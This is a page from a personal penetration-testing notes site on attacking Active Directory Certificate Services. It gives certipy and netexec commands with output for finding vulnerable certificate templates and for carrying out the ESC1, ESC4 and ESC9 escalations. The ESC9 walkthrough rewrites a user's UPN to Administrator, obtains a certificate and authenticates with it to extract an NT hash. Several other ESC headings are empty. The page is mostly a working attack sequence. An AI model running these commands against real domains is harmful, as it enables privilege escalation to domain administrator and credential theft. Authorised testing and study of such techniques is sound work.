Dado1513
  • Dado1513 Pentest Notes
  • Introduction & Documentation
  • Pentesting Methodologies
  • External Recon Pentesting
  • Brute Force
  • LotL - Living off the Land
  • Pivoting Tunnelling and Port Forward
  • Active Directory
    • 🛠️Active Directory Enumeration & Attacks
    • 🛠️ACL/ACE Abuse
    • 🛠️ADCS
    • Kerberos Attack Cheatsheet
  • Linux Pentesting
    • Linux Privilege Escalation
  • Windows Pentesting
    • Windows Privilege Escalation
  • Mobile Pentesting
    • 🛠️Android Application Pentesting
    • iOS Application Pentesting
  • Cloud Pentest
    • 🛠️Cloud Pentesting
  • Wireless Pentesting
    • 🛠️WiFi Pentesting
  • Web Pentesting
    • 🛠️XSS Cheatsheet
    • 🛠️SQL Injection
  • OSINT
    • Google Dorks
  • Network Services Pentest
    • Attacking Common Services
    • 🛠️139,445 SMB
    • 🛠️161,162,10161,10162- Pentesting SNMP
    • 🛠️winrm
  • Tools
    • NetExec
    • Chisel
    • bloodyAD
    • PowerView
    • Certipy
    • sqlmap
    • mimikatz
Powered by GitBook
On this page
  • ADCS
  • Info
  • ESC1 - template-allows-san
  • ESC2
  • ESC3
  • ESC4 - certificate-templates
  • ESC5
  • ESC6
  • ESC7
  • ESC8
  • ESC9 - no-security-extension
  • ESC10
  • ESC11
  • ESC12
  • ESC13
  • ESC14
  • ESC15
  • Risorse
  1. Active Directory

ADCS

ADCS

Info

Search CA

┌──(kali㉿kali)-[~/…/machines/lab/certified-medium/certify]
└─$ netexec ldap domain_controlled -d domain.local  -u 'user' -p 'password' -M adcs

SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:domain.loca) (signing:True) (SMBv1:False)
LDAP        10.10.11.41     389    DC01             [+] domain.local\user:password 
ADCS        10.10.11.41     389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.11.41     389    DC01             Found PKI Enrollment Server: DC01.domain.local
ADCS        10.10.11.41     389    DC01             Found CN: certified-DC01-CA

certify.exe find /vulnerable
certipy find -u 'user' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce'  -dc-ip 10.10.11.51   
certipy find -u '[email protected]' -p <password> -dc-ip <DC_IP> -vulnerable -enabled

ESC1 - template-allows-san

ESC1 is when a certificate template permits Client Authentication and allows the enrollee to supply an arbitrary Subject Alternative Name (SAN). Request a certificate based on the vulnerable certificate template and specify an arbitrary UPN

certipy-ad req -u user -target target.local -upn [email protected] -ca hostname_ca -template vulnerable_template -hashes NTLM_HASH -key-size 4096  -dns 10.10.11.51 -dc-ip 10.10.11.51

ESC2

ESC3

ESC4 - certificate-templates

ESC4 is when a user has write privileges over a certificate template. This can for instance be abused to overwrite the configuration of the certificate template to make the template vulnerable to ESC1. We need to know the DNS name and the Template Name

certipy template -username [email protected]  -hashes NTLM_HASH  -template Vulnerable_template  -save-old

ESC5

ESC6

ESC7

ESC8

ESC9 - no-security-extension

To understand this privilege escalation, it is recommended to know how certificate mapping is performed. It is presented in this section.

If the certificate attribute msPKI-Enrollment-Flag contains the flag CT_FLAG_NO_SECURITY_EXTENSION, the szOID_NTDS_CA_SECURITY_EXT extension will not be embedded, meaning that even with StrongCertificateBindingEnforcement set to 1, the mapping will be performed similarly as a value of 0 in the registry key.

Here are the requirements to perform ESC9:

  • StrongCertificateBindingEnforcement not set to 2 (default: 1) or CertificateMappingMethods contains UPN flag (0x4)

  • The template contains the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value

  • The template specifies client authentication

  • GenericWrite right against any account A/1 to compromise any account B/2

  • Update upn user2

certipy account update -username "[email protected]" -hashes "a091c1832bcdd4677c28b5a6a1295584" -user "user2" -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'user2':
    userPrincipalName                   : Administrator
[*] Successfully updated 'user2'

  • Get pfx

certipy req -username "user2" -p "12345678" -target "10.10.11.41" -ca 'CA_NAME' -template 'TemplateName'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

  • Extracting NTHASH

certipy auth -pfx administrator.pfx -domain domain.local

ESC10

ESC11

ESC12

ESC13

ESC14

ESC15

Risorse

  • https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-1-799f3d3b03cf

  • https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-2-ac7f925d1547

  • https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-3-33efb00856ac

  • https://www.thehacker.recipes/ad/movement/adcs/

  • https://posts.specterops.io/certified-pre-owned-d95910965cd2

  • https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin

  • https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/

PreviousACL/ACE AbuseNextKerberos Attack Cheatsheet

Last updated 23 days ago

🛠️